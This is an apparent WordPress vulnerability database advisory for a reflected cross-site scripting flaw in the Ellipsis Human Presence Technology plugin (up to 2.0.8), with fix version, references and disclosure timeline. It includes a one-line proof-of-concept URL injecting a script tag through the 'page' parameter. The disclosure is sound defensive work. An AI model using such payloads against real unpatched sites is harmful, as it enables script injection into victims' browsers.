Ellipsis Human Presence Technology <= 2.0.8 - Unauthenticated Reflected Cross Site Scripting (XSS)



Description

The 'page' GET parameter of the inc/protected-forms-table.php file was affected by a reflected XSS vulnerability.

Proof of Concept

http://www.example.com/wp-content/plugins/ellipsis-human-presence-technology/inc/protected-forms-table.php?&page="%20><script>alert("XSS")</script>

Affects Plugin

ellipsis-human-presence-technology: fixed in version 2.0.9

References

PacketStorm: 154393
URL: https://plugins.trac.wordpress.org/changeset/2155131/ellipsis-human-presence-technology

Classification

Type: XSS
OWASP Top 10: A7: Cross-Site Scripting (XSS)
CWE: CWE-79

Miscellaneous

Original Researcher: Ricardo Sanchez
Verified: No
WPVDB ID: 9875

Timeline

Publicly Published: 2019-09-07
Added: 2019-09-10
Last Updated: 2020-02-13
